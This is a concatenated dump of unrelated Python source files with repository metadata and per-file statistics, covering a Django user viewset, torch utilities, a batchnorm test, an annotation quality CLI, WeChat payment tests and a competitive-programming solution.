            # creations or themselves).
            queryset = self.get_queryset()
            if not queryset.filter(id=pk):
                raise self.response.Fail(message="不能修改非自己创建的用户")
        return super(userViewSet, self).update(request, pk, *args, **kwargs)

    @HasPerm(perm_code='sys:user:delete')
    def destroy(self, request, pk=None, *args, **kwargs):
        if not request.user.is_superuser:
            queryset = self.get_queryset()
            if not queryset.filter(id=pk):
                raise self.response.Fail(message="不能删除非自己创建的用户")
        return super(userViewSet, self).destroy(request, pk, *args, **kwargs)
| 35.310345 | 85 | 0.657227 | 248 | 2,048 | 5.25 | 0.25 | 0.061444 | 0.053763 | 0.069124 | 0.449309 | 0.417051 | 0.417051 | 0.392473 | 0.304147 | 0.304147 | 0 | 0.000622 | 0.214844 | 2,048 | 57 | 86 | 35.929825 | 0.80908 | 0.013672 | 0 | 0.2 | 0 | 0 | 0.073852 | 0.020958 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0.1 | 0 | 0.35 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e408b3e9e6971147d3597ad584a01e192b436c3 | 1,602 | py | Python | crslab/system/utils/functions.py | Zyh716/WSDM2022-C2CRS | 8ef2fa7c44bdba1799ab79f379ae7394bd468c02 | [
"MIT"
] | 4 | 2022-03-24T02:14:50.000Z | 2022-03-30T02:28:19.000Z | crslab/system/utils/functions.py | RUCAIBox/WSDM2022-C2CRS | 8ef2fa7c44bdba1799ab79f379ae7394bd468c02 | [
"MIT"
] | null | null | null | crslab/system/utils/functions.py | RUCAIBox/WSDM2022-C2CRS | 8ef2fa7c44bdba1799ab79f379ae7394bd468c02 | [
"MIT"
] | 2 | 2022-03-23T02:24:24.000Z | 2022-03-28T12:45:43.000Z | # @Time : 2020/11/22
# @Author : Kun Zhou
# @Email : francis_kun_zhou@163.com
# UPDATE:
# @Time : 2020/11/24, 2020/12/18
# @Author : Kun Zhou, Xiaolei Wang
# @Email : francis_kun_zhou@163.com, wxl1999@foxmail.com
import torch
def compute_grad_norm(parameters, norm_type=2.0):
    """
    Compute norm over gradients of model parameters.

    :param parameters:
        the model parameters for gradient norm calculation. Iterable of
        Tensors or single Tensor
    :param norm_type:
        type of p-norm to use
    :returns:
        the computed gradient norm
    """
    if isinstance(parameters, torch.Tensor):
        parameters = [parameters]
    # Skip missing parameters and parameters that never received a gradient.
    grads = [p.grad.data for p in parameters if p is not None and p.grad is not None]
    accumulated = sum(g.norm(norm_type).item() ** norm_type for g in grads)
    return accumulated ** (1.0 / norm_type)
def ind2txt(inds, ind2tok, end_token_idx=None, unk_token='unk'):
    """Convert a sequence of token indices into a space-joined string.

    :param inds: iterable of int indices (scalar torch Tensors are unwrapped)
    :param ind2tok: mapping from index to token string
    :param end_token_idx: index that terminates decoding (exclusive)
    :param unk_token: fallback token for indices missing from ``ind2tok``
    :returns: the decoded sentence as a single space-joined string
    """
    sentence = []
    for ind in inds:
        if isinstance(ind, torch.Tensor):
            ind = ind.item()
        # Compare against None explicitly: the old truthiness test
        # (``if end_token_idx and ...``) silently ignored an end token
        # whose index is 0.
        if end_token_idx is not None and ind == end_token_idx:
            break
        sentence.append(ind2tok.get(ind, unk_token))
    return ' '.join(sentence)
def ind2txt2(inds, ind2tok, end_token_idx=None, unk_token='unk'):
sentence = []
for ind in inds:
if isinstance(ind, torch.Tensor):
ind = ind.item()
if end_token_idx and ind == end_token_idx:
break
sentence.append(ind2tok.get(ind, unk_token))
return ' '.join(sentence), sentence | 29.666667 | 80 | 0.639201 | 224 | 1,602 | 4.428571 | 0.330357 | 0.048387 | 0.066532 | 0.038306 | 0.415323 | 0.415323 | 0.364919 | 0.364919 | 0.364919 | 0.364919 | 0 | 0.038655 | 0.257179 | 1,602 | 54 | 81 | 29.666667 | 0.794958 | 0.285268 | 0 | 0.5 | 0 | 0 | 0.007299 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107143 | false | 0 | 0.035714 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e4320c42b205cf8fac729bae60ca26c77a94436 | 2,149 | py | Python | time_window_generator.py | alphagov/blocker | 7de98d38bf52e23d9a29c9cea2d956333b28f2dc | [
"MIT"
] | null | null | null | time_window_generator.py | alphagov/blocker | 7de98d38bf52e23d9a29c9cea2d956333b28f2dc | [
"MIT"
] | null | null | null | time_window_generator.py | alphagov/blocker | 7de98d38bf52e23d9a29c9cea2d956333b28f2dc | [
"MIT"
] | 2 | 2020-08-12T20:38:39.000Z | 2021-04-10T19:30:16.000Z | #!/usr/bin/env python
from datetime import datetime, timedelta, time
from day import Day
from window import Window
__author__ = "Aditya Pahuja"
__copyright__ = "Copyright (c) 2020"
__maintainer__ = "Aditya Pahuja"
__email__ = "aditya.s.pahuja@gmail.com"
__status__ = "Production"
class TimeWindowGenerator:
def __init__(self, days, start_time, stop_time, time_zone):
self.days = set()
for day in days:
self.days.add(Day[day].value)
self.start_time = start_time
self.stop_time = stop_time
self.time_zone = time_zone
def get_window_of_time(self, current_date):
if current_date.weekday() in self.days:
current_time = time(current_date.hour, current_date.minute, current_date.second, current_date.microsecond, self.time_zone)
if current_time > self.stop_time:
return self.get_next_window_of_time(current_date)
else:
return self.get_today_window_of_time(current_date)
else:
return self.get_next_window_of_time(current_date)
def get_next_window_of_time(self, window_date):
window_date = window_date + timedelta(1)
while window_date.weekday() not in self.days:
window_date = window_date + timedelta(1)
return self.get_today_window_of_time(window_date)
def get_today_window_of_time(self, window_date):
window_start_date = datetime(window_date.year, window_date.month, window_date.day,
self.start_time.hour, self.start_time.minute, self.start_time.second,
self.start_time.microsecond)
window_start_date = self.time_zone.localize(window_start_date, is_dst=True)
window_stop_date = datetime(window_date.year, window_date.month, window_date.day,
self.stop_time.hour, self.stop_time.minute, self.stop_time.second,
self.stop_time.microsecond)
window_stop_date = self.time_zone.localize(window_stop_date, is_dst=True)
return Window(window_start_date, window_stop_date)
| 42.137255 | 134 | 0.672871 | 283 | 2,149 | 4.70318 | 0.215548 | 0.105184 | 0.06311 | 0.036063 | 0.351615 | 0.340346 | 0.254696 | 0.180316 | 0.180316 | 0.087153 | 0 | 0.003713 | 0.248022 | 2,149 | 50 | 135 | 42.98 | 0.819926 | 0.009307 | 0 | 0.15 | 0 | 0 | 0.037124 | 0.011748 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.075 | 0 | 0.325 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e4538ae3c50b4c457a9fa19bf22b5b1a7b666ee | 1,976 | py | Python | tests/test_numeric_batchnorm_v2.py | DTennant/Synchronized-BatchNorm-PyTorch | 8cba183f50b630b1c8baa33ddb2fafac61219acd | [
"MIT"
] | 1,443 | 2018-01-27T12:35:13.000Z | 2022-03-31T07:17:45.000Z | tests/test_numeric_batchnorm_v2.py | DTennant/Synchronized-BatchNorm-PyTorch | 8cba183f50b630b1c8baa33ddb2fafac61219acd | [
"MIT"
] | 45 | 2018-04-10T04:26:37.000Z | 2021-09-05T05:16:02.000Z | tests/test_numeric_batchnorm_v2.py | DTennant/Synchronized-BatchNorm-PyTorch | 8cba183f50b630b1c8baa33ddb2fafac61219acd | [
"MIT"
] | 182 | 2018-02-11T10:17:46.000Z | 2022-03-26T23:31:13.000Z | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# File : test_numeric_batchnorm_v2.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 11/01/2018
#
# Distributed under terms of the MIT license.
"""
Test the numerical implementation of batch normalization.
Author: acgtyrant.
See also: https://github.com/vacancy/Synchronized-BatchNorm-PyTorch/issues/14
"""
import unittest
import torch
import torch.nn as nn
import torch.optim as optim
from sync_batchnorm.unittest import TorchTestCase
from sync_batchnorm.batchnorm_reimpl import BatchNorm2dReimpl
class NumericTestCasev2(TorchTestCase):
def testNumericBatchNorm(self):
CHANNELS = 16
batchnorm1 = nn.BatchNorm2d(CHANNELS, momentum=1)
optimizer1 = optim.SGD(batchnorm1.parameters(), lr=0.01)
batchnorm2 = BatchNorm2dReimpl(CHANNELS, momentum=1)
batchnorm2.weight.data.copy_(batchnorm1.weight.data)
batchnorm2.bias.data.copy_(batchnorm1.bias.data)
optimizer2 = optim.SGD(batchnorm2.parameters(), lr=0.01)
for _ in range(100):
input_ = torch.rand(16, CHANNELS, 16, 16)
input1 = input_.clone().requires_grad_(True)
output1 = batchnorm1(input1)
output1.sum().backward()
optimizer1.step()
input2 = input_.clone().requires_grad_(True)
output2 = batchnorm2(input2)
output2.sum().backward()
optimizer2.step()
self.assertTensorClose(input1, input2)
self.assertTensorClose(output1, output2)
self.assertTensorClose(input1.grad, input2.grad)
self.assertTensorClose(batchnorm1.weight.grad, batchnorm2.weight.grad)
self.assertTensorClose(batchnorm1.bias.grad, batchnorm2.bias.grad)
self.assertTensorClose(batchnorm1.running_mean, batchnorm2.running_mean)
self.assertTensorClose(batchnorm2.running_mean, batchnorm2.running_mean)
if __name__ == '__main__':
unittest.main()
| 31.365079 | 80 | 0.697368 | 217 | 1,976 | 6.221198 | 0.465438 | 0.108889 | 0.055556 | 0.077778 | 0.085926 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045512 | 0.199393 | 1,976 | 62 | 81 | 31.870968 | 0.807838 | 0.178644 | 0 | 0 | 0 | 0 | 0.004978 | 0 | 0 | 0 | 0 | 0 | 0.205882 | 1 | 0.029412 | false | 0 | 0.176471 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e473bcf98d67cb78caa5464367510273160301b | 1,245 | py | Python | tools/platform-tools/systrace/catapult/common/py_utils/py_utils/refactor/annotated_symbol/base_symbol.py | rutherlesdev/android-spyware | ddcf6b73f48d78cbb201e749c1e5941f8efd90e6 | [
"MIT"
] | 138 | 2020-12-09T07:08:43.000Z | 2022-03-30T22:32:09.000Z | tools/platform-tools/systrace/catapult/common/py_utils/py_utils/refactor/annotated_symbol/base_symbol.py | rutherlesdev/android-spyware | ddcf6b73f48d78cbb201e749c1e5941f8efd90e6 | [
"MIT"
] | 20 | 2020-04-08T13:50:39.000Z | 2022-03-31T01:01:54.000Z | tools/platform-tools/systrace/catapult/common/py_utils/py_utils/refactor/annotated_symbol/base_symbol.py | rutherlesdev/android-spyware | ddcf6b73f48d78cbb201e749c1e5941f8efd90e6 | [
"MIT"
] | 43 | 2020-12-11T09:43:14.000Z | 2022-03-08T12:56:30.000Z | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from py_utils.refactor import snippet
from six.moves import range # pylint: disable=redefined-builtin
class AnnotatedSymbol(snippet.Symbol):
def __init__(self, symbol_type, children):
super(AnnotatedSymbol, self).__init__(symbol_type, children)
self._modified = False
@property
def modified(self):
if self._modified:
return True
return super(AnnotatedSymbol, self).modified
def __setattr__(self, name, value):
if (hasattr(self.__class__, name) and
isinstance(getattr(self.__class__, name), property)):
self._modified = True
return super(AnnotatedSymbol, self).__setattr__(name, value)
def Cut(self, child):
for i in range(len(self._children)):
if self._children[i] == child:
self._modified = True
del self._children[i]
break
else:
raise ValueError('%s is not in %s.' % (child, self))
def Paste(self, child):
self._modified = True
self._children.append(child)
| 30.365854 | 72 | 0.715663 | 163 | 1,245 | 5.159509 | 0.490798 | 0.085612 | 0.057075 | 0.071344 | 0.080856 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003988 | 0.194378 | 1,245 | 40 | 73 | 31.125 | 0.834497 | 0.151807 | 0 | 0.1 | 0 | 0 | 0.015224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.466667 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e4902a1c36ea35fcc7670742a835b7d87381ad7 | 6,628 | py | Python | ground_truth_labeling_jobs/video_annotations_quality_assessment/quality_metrics_cli.py | fhirschmann/amazon-sagemaker-examples | bb4a4ed78cd4f3673bd6894f0b92ab08aa7f8f29 | [
"Apache-2.0"
] | 2 | 2021-07-20T18:25:10.000Z | 2022-01-20T00:04:07.000Z | ground_truth_labeling_jobs/video_annotations_quality_assessment/quality_metrics_cli.py | fhirschmann/amazon-sagemaker-examples | bb4a4ed78cd4f3673bd6894f0b92ab08aa7f8f29 | [
"Apache-2.0"
] | 1 | 2021-03-25T18:31:29.000Z | 2021-03-25T18:31:29.000Z | ground_truth_labeling_jobs/video_annotations_quality_assessment/quality_metrics_cli.py | fhirschmann/amazon-sagemaker-examples | bb4a4ed78cd4f3673bd6894f0b92ab08aa7f8f29 | [
"Apache-2.0"
] | 1 | 2021-04-10T01:56:37.000Z | 2021-04-10T01:56:37.000Z | import os
import json
import numpy as np
import argh
import boto3
from argh import arg
from tqdm import tqdm
from scipy.spatial import distance
from plotting_funcs import *
# Module-level S3 client reused for the label download/upload calls below.
s3 = boto3.client('s3')
def compute_dist(img_embeds, dist_func=distance.euclidean, obj='Vehicle:1'):
    """Distances between ``obj``'s embeddings in consecutive frames.

    ``img_embeds`` maps frame index -> {object name -> embedding}.  Returns
    (distances, frame indices) for every frame whose predecessor also
    contains the object.
    """
    dists = []
    inds = []
    for frame_idx in img_embeds:
        if frame_idx <= 0:
            continue
        if obj not in img_embeds[frame_idx] or obj not in img_embeds[frame_idx - 1]:
            continue
        # Distance between the object's embedding at t-1 and at t.
        dists.append(dist_func(img_embeds[frame_idx - 1][obj], img_embeds[frame_idx][obj]))
        inds.append(frame_idx)
    return dists, inds
def get_problem_frames(lab_frame, flawed_labels, size_thresh=.25, iou_thresh=.4, embed=False, imgs=None, verbose=False, embed_std=2):
    """
    Function for identifying potentially problematic frames using bounding box size, rolling IoU, and optionally embedding comparison.

    Returns a dict keyed by object name; each entry holds size-change
    vectors, per-frame IoU, and lists of suspect frame indices.
    """
    if embed:
        # Pretrained ResNet-18 with its classification head removed, used as
        # a feature extractor for per-object crops (downloads via torch.hub).
        model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet18', pretrained=True)
        model.eval()
        modules = list(model.children())[:-1]
        model = nn.Sequential(*modules)

    frame_res = {}
    for obj in list(np.unique(lab_frame.obj)):
        frame_res[obj] = {}
        lframe_len = max(lab_frame['frameid'])
        ann_subframe = lab_frame[lab_frame.obj == obj]
        # Per-frame bounding-box area; frames without this object stay 0.
        size_vec = np.zeros(lframe_len + 1)
        size_vec[ann_subframe['frameid'].values] = ann_subframe['height'] * ann_subframe['width']
        # Relative frame-to-frame size change; NaN/inf (from a zero-sized
        # previous box) are treated as "no change".
        size_diff = np.array(size_vec[:-1]) - np.array(size_vec[1:])
        norm_size_diff = size_diff / np.array(size_vec[:-1])
        norm_size_diff[np.where(np.isnan(norm_size_diff))[0]] = 0
        norm_size_diff[np.where(np.isinf(norm_size_diff))[0]] = 0
        frame_res[obj]['size_diff'] = [int(x) for x in size_diff]
        # NOTE(review): int() truncates the normalized (fractional) diffs to
        # 0/±1; kept as-is to preserve existing output -- confirm intended.
        frame_res[obj]['norm_size_diff'] = [int(x) for x in norm_size_diff]
        try:
            problem_frames = [int(x) for x in np.where(np.abs(norm_size_diff) > size_thresh)[0]]
            if verbose:
                worst_frame = np.argmax(np.abs(norm_size_diff))
                # Fixed: the original printed an undefined name ``frame``
                # here, raising NameError and silently emptying
                # problem_frames via the except below whenever verbose=True.
                print('Worst frame for', obj, 'is: ', worst_frame)
        except:
            problem_frames = []
        frame_res[obj]['size_problem_frames'] = problem_frames

        # Rolling IoU of the object's box between consecutive frames.
        iou_vec = np.ones(len(np.unique(lab_frame.frameid)))
        for i in lab_frame[lab_frame.obj == obj].frameid[:-1]:
            iou = calc_frame_int_over_union(lab_frame, obj, i)
            iou_vec[i] = iou
        frame_res[obj]['iou'] = iou_vec.tolist()
        inds = [int(x) for x in np.where(iou_vec < iou_thresh)[0]]
        frame_res[obj]['iou_problem_frames'] = inds

        if embed:
            img_crops = {}
            img_embeds = {}
            for j, img in tqdm(enumerate(imgs)):
                img_arr = np.array(img)
                img_embeds[j] = {}
                img_crops[j] = {}
                for i, annot in enumerate(flawed_labels['tracking-annotations'][j]['annotations']):
                    try:
                        crop = img_arr[annot['top']:(annot['top'] + annot['height']), annot['left']:(annot['left'] + annot['width']), :]
                        new_crop = np.array(Image.fromarray(crop).resize((224, 224)))
                        img_crops[j][annot['object-name']] = new_crop
                        # NOTE(review): these reshapes reorder raw pixel data
                        # rather than transposing HWC->CHW; kept as-is to
                        # preserve existing behavior -- confirm intended.
                        new_crop = np.reshape(new_crop, (1, 224, 224, 3))
                        new_crop = np.reshape(new_crop, (1, 3, 224, 224))
                        torch_arr = torch.tensor(new_crop, dtype=torch.float)
                        with torch.no_grad():
                            emb = model(torch_arr)
                        img_embeds[j][annot['object-name']] = emb.squeeze()
                    except:
                        pass
            # Fixed: compute_dist returns (dists, inds); the original bound
            # the whole tuple to ``dists``, breaking the comparison below.
            dists, _ = compute_dist(img_embeds, obj=obj)
            # look for distances that are 2+ standard deviations greater than the mean distance
            prob_frames = np.where(dists > (np.mean(dists) + np.std(dists) * embed_std))[0]
            frame_res[obj]['embed_prob_frames'] = prob_frames.tolist()

    return frame_res
# for frame in tqdm(frame_dict):
@arg('--bucket', help='s3 bucket to retrieve labels from and save result to', default=None)
@arg('--lab_path', help='s3 key for labels to be analyzed, an example would look like mot_track_job_results/annotations/consolidated-annotation/output/0/SeqLabel.json', default=None)
@arg('--size_thresh', help='Threshold for identifying allowable percentage size change for a given object between frames', default=.25)
@arg('--iou_thresh', help='Threshold for identifying the bounding boxes of objects that fall below this IoU metric between frames', default=.4)
@arg('--embed', help='Perform sequential object bounding box crop embedding comparison. Generates embeddings for the crop of a given object throughout the video and compares them sequentially, requires downloading a model from PyTorch Torchhub', default=False)
@arg('--imgs', help='Path to images to be used for sequential embedding analysis, only required if embed=True', default=None)
@arg('--save_path', help='s3 key to save quality analysis results to', default=None)
def run_quality_check(bucket=None, lab_path=None,
                      size_thresh=.25, iou_thresh=.4, embed=False, imgs=None, save_path=None):
    """
    Main data quality check utility.

    Designed for use on a single video: provide the s3 key of a
    SeqLabel.json file, typically found in the s3 output folder of a Ground
    Truth Video job under annotations > consolidated-annotation > output.
    """
    print('downloading labels')
    s3.download_file(Bucket=bucket, Key=lab_path, Filename='SeqLabel.json')
    with open('SeqLabel.json', 'r') as label_file:
        tracking_labels = json.load(label_file)
    annotation_frame = create_annot_frame(tracking_labels['tracking-annotations'])
    print('Running analysis...')
    # NOTE(review): ``imgs`` is not forwarded to get_problem_frames, yet the
    # --embed path depends on images being supplied -- confirm.
    results = get_problem_frames(annotation_frame, tracking_labels,
                                 size_thresh=size_thresh, iou_thresh=iou_thresh, embed=embed)
    with open('quality_results.json', 'w') as out_file:
        json.dump(results, out_file)
    print(f'Output saved to s3 path s3://{bucket}/{save_path}')
    s3.upload_file(Bucket=bucket, Key=save_path, Filename='quality_results.json')
def main():
    """Command-line entry point: expose run_quality_check through argh."""
    cli = argh.ArghParser()
    cli.add_commands([run_quality_check])
    cli.dispatch()


if __name__ == "__main__":
    main()
| 47.007092 | 260 | 0.62764 | 916 | 6,628 | 4.365721 | 0.281659 | 0.026007 | 0.027007 | 0.008002 | 0.152788 | 0.108777 | 0.08077 | 0.033508 | 0.020005 | 0.020005 | 0 | 0.014848 | 0.248039 | 6,628 | 140 | 261 | 47.342857 | 0.78752 | 0.103651 | 0 | 0.057692 | 0 | 0.019231 | 0.208715 | 0.021363 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0.009615 | 0.086538 | 0 | 0.144231 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e4a3e9a66a68d2616331c835300d200618cdcd2 | 3,483 | py | Python | tests/test_payment.py | istommao/wechatkit | e46341c29a69805a8e4c425dc620039fb06b1e45 | [
"MIT"
] | 11 | 2016-09-10T02:21:47.000Z | 2017-10-18T14:49:41.000Z | tests/test_payment.py | istommao/wechatkit | e46341c29a69805a8e4c425dc620039fb06b1e45 | [
"MIT"
] | 5 | 2016-09-10T03:47:26.000Z | 2019-10-02T19:07:50.000Z | tests/test_payment.py | istommao/wechatkit | e46341c29a69805a8e4c425dc620039fb06b1e45 | [
"MIT"
] | 1 | 2016-09-10T02:40:29.000Z | 2016-09-10T02:40:29.000Z | """Test wechat payment module."""
from unittest import TestCase
from unittest.mock import patch
from wechatkit.exceptions import WechatKitException
from wechatkit.payment import WechatPay
class WechatPayTest(TestCase):
    """Unit tests for the WechatPay payment client."""

    def setUp(self):
        """Create a WechatPay client with dummy credentials."""
        self.appid = 'appid'
        self.pay = WechatPay(self.appid, 'mch_id', 'key')
        self.data = ''

    def tearDown(self):
        """Tear down."""

    def get_data(self):
        """Build and cache a dummy order payload."""
        self.data = {
            'title': 'title',
            'order_uid': 'order_uid',
            'total': 10,
            'notify_url': 'notify_url',
            'trade_type': 'JSAPI',
            'ip': '127.0.0.1',
            'detail': 'test detail',
            'time_expire': 'now + 30m',
            'time_start': 'now',
            'product_id': 1
        }
        return self.data

    @patch('wechatkit.utils.RequestUtil.post_xml')
    def test_close_order(self, post_mock):
        """A SUCCESS close-order call returns the gateway response unchanged."""
        response = {
            'return_code': 'SUCCESS',
            'return_msg': 'OK',
            'appid': self.appid
        }
        post_mock.return_value = response
        result = self.pay.close_order(order_uid='12312321321')
        self.assertEqual(result, response)

    @patch('wechatkit.utils.RequestUtil.post_xml')
    def test_close_order_failure(self, post_mock):
        """A FAIL return code raises WechatKitException with the gateway message."""
        post_mock.return_value = {
            'return_code': 'FAIL',
            'return_msg': '签名失败'
        }
        with self.assertRaises(WechatKitException) as error:
            self.pay.close_order(order_uid='12312321321')
        self.assertEqual(error.exception.error_info, '签名失败')

    @patch('wechatkit.utils.RequestUtil.post_xml')
    def test_create_order(self, post_mock):
        """A successful order creation returns the parsed gateway response."""
        post_mock.return_value = {'name': 'test', 'return_code': 'SUCCESS'}
        payload = self.get_data()
        resp = self.pay.create_order('openid', **payload)
        self.assertEqual(resp['name'], 'test')

    @patch('wechatkit.utils.RequestUtil.post_xml')
    def test_create_order_failure(self, post_mock):
        """A non-SUCCESS return code raises WechatKitException."""
        post_mock.return_value = {
            'return_msg': 'test', 'return_code': 'FAILURE'
        }
        payload = self.get_data()
        with self.assertRaises(WechatKitException) as error:
            self.pay.create_order('openid', **payload)
        self.assertEqual(error.exception.error_info, 'test')

    def test_create_order_check_data(self):
        """Invalid order fields are rejected before any network call."""
        payload = self.get_data()

        payload['title'] = ''
        with self.assertRaises(WechatKitException) as error:
            self.pay.create_order('openid', **payload)
        self.assertEqual(error.exception.error_info, '订单描述不能为空')

        payload['title'] = 'title'
        with self.assertRaises(WechatKitException) as error:
            self.pay.create_order(None, **payload)
        self.assertEqual(error.exception.error_info, '用户标识不能为空')

        payload['trade_type'] = self.pay.PAYMENT_NATIVE
        payload['product_id'] = ''
        with self.assertRaises(WechatKitException) as error:
            self.pay.create_order(None, **payload)
        self.assertEqual(error.exception.error_info, '商品ID不能为空')
| 31.098214 | 75 | 0.585989 | 377 | 3,483 | 5.233422 | 0.233422 | 0.044602 | 0.050684 | 0.0963 | 0.550938 | 0.528637 | 0.516979 | 0.480993 | 0.432843 | 0.342625 | 0 | 0.013137 | 0.278783 | 3,483 | 111 | 76 | 31.378378 | 0.772293 | 0.063451 | 0 | 0.3 | 0 | 0 | 0.171909 | 0.044846 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.1 | false | 0 | 0.05 | 0 | 0.175 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e4a7fc5fcab7bdd5a11e8b8c9410751f69ce97d | 1,555 | py | Python | contests_atcoder/abc175/abc175_d.py | takelifetime/competitive-programming | e7cf8ef923ccefad39a1727ca94c610d650fcb76 | [
"BSD-2-Clause"
] | null | null | null | contests_atcoder/abc175/abc175_d.py | takelifetime/competitive-programming | e7cf8ef923ccefad39a1727ca94c610d650fcb76 | [
"BSD-2-Clause"
] | 1 | 2021-01-02T06:36:51.000Z | 2021-01-02T06:36:51.000Z | contests_atcoder/abc175/abc175_d.py | takelifetime/competitive-programming | e7cf8ef923ccefad39a1727ca94c610d650fcb76 | [
"BSD-2-Clause"
from itertools import accumulate, chain, combinations, groupby, permutations, product
from collections import deque, Counter
from bisect import bisect_left, bisect_right
from math import gcd, sqrt, sin, cos, tan, degrees, radians
from fractions import Fraction
from decimal import Decimal
import sys

# from sys import setrecursionlimit
# setrecursionlimit(10**7)
MOD = 10 ** 9 + 7
INF = float('inf')


def build_cycles(n, p, c):
    """Decompose the 1-based permutation *p* into its cycles.

    :param n: number of squares.
    :param p: permutation as a list of 1-based targets, p[i] is where
        square i+1 moves to.
    :param c: score written on each square (0-based).
    :return: list of dicts, one per cycle, with keys:
        'sC'       -- prefix sums of the scores collected along the cycle,
                      duplicated once so any window of length <= cycle length
                      starting anywhere is a plain slice,
        'len'      -- cycle length,
        'loopgain' -- max(0, total score of one full loop).
    """
    unvisited = list(range(n))
    cycles = []
    while unvisited:
        start = unvisited.pop(-1)
        cur = {"sC": [c[start]], "len": 0, "loopgain": 0}
        now = start
        while True:
            now = p[now] - 1
            if now == start:
                cur["len"] = len(cur["sC"])
                cur["loopgain"] = max(0, cur["sC"][-1])
                # Double the prefix-sum array so wrap-around windows need no
                # modular arithmetic.
                cur["sC"] += [x + cur["sC"][-1] for x in cur["sC"]]
                break
            cur["sC"].append(cur["sC"][-1] + c[now])
            unvisited.remove(now)
        cycles.append(cur)
    return cycles


def solve(n, k, p, c):
    """Best total score reachable with between 1 and *k* moves (ABC175 D).

    For every cycle, every start position and every tail length, combine the
    windowed gain with as many profitable full loops as the move budget
    allows.
    """
    best = -INF
    for graph in build_cycles(n, p, c):
        full_loops, k_mod = divmod(k, graph["len"])
        for i in range(graph["len"]):
            for movedist in range(1, graph["len"] + 1):
                if movedist > k:
                    continue
                gain = graph["sC"][i + movedist] - graph["sC"][i]
                if movedist > k_mod:
                    # Tail longer than the leftover budget: must sacrifice
                    # one full loop to afford it.
                    best = max(best, gain + (full_loops - 1) * graph["loopgain"])
                else:
                    best = max(best, gain + full_loops * graph["loopgain"])
    return best


def main():
    """Read the problem input from stdin and print the answer."""
    read = sys.stdin.readline
    n, k = map(int, read().split())
    p = list(map(int, read().split()))
    c = list(map(int, read().split()))
    print(solve(n, k, p, c))


if __name__ == '__main__':
    main()
5e4ce3937f385a6c6a274b4bf9572ffcab45fa8a | 1,131 | py | Python | aquami3D/meshgrid test.py | JStuckner/Aquami3D | 72dd59f2b62b008b48d3c6c25db76aa0c7607020 | [
"MIT"
] | null | null | null | aquami3D/meshgrid test.py | JStuckner/Aquami3D | 72dd59f2b62b008b48d3c6c25db76aa0c7607020 | [
"MIT"
] | null | null | null | aquami3D/meshgrid test.py | JStuckner/Aquami3D | 72dd59f2b62b008b48d3c6c25db76aa0c7607020 | [
"MIT"
] | null | null | null | import numpy as np
import time
#https://stackoverflow.com/questions/8956832/python-out-of-memory-on-large-csv-file-numpy?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa
def iter_loadtxt(filename, delimiter=' ', skiprows=0, skipcols=0, dtype=float, ncols=3):
    """Memory-efficient replacement for ``np.loadtxt``.

    Streams *filename* token by token through ``np.fromiter`` instead of
    materialising the whole file, keeping peak memory low for large dumps.

    :param filename: path of the text file to parse.
    :param delimiter: field separator passed to ``str.split``.
    :param skiprows: number of header lines to skip.
    :param skipcols: index of the first column to keep.
    :param dtype: scalar type each token is converted to.
    :param ncols: number of columns to keep starting at *skipcols*
        (default 3, matching the original hard-coded x/y/z behaviour).
    :return: ``(n_rows, ncols)`` ndarray.
    """
    def iter_func():
        with open(filename, 'r') as infile:
            for _ in range(skiprows):
